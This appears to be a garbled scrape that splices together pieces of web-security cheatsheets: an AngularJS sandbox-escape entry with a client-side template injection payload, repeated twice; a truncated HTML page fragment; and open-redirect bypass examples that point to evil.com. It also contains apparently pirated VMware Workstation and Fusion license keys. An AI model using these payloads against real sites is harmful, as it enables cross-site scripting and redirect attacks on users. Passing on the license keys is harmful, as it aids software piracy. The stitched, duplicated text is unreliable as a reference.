#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>I LOVE YOU</title> | |
<script> | |
onload = function () { | |
var d = document; | |
// フェードイン | |
function feedin (feed, speed) { | |
var filter = 0; |
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
Bypass the filter when protocol is blacklisted using //
Example: ?redirect=https://example.com --> ?redirect=//evil.com
Obviously using these keys may be a grey area. I use them for my computer, but there are no guarentees VMware won't sue you if you use them in a commercial environment. | |
VMware Workstation 16 | |
YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
VMware Fusion Pro 12 | |
YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
As far as I know, this key works on both Fusion and Workstation. |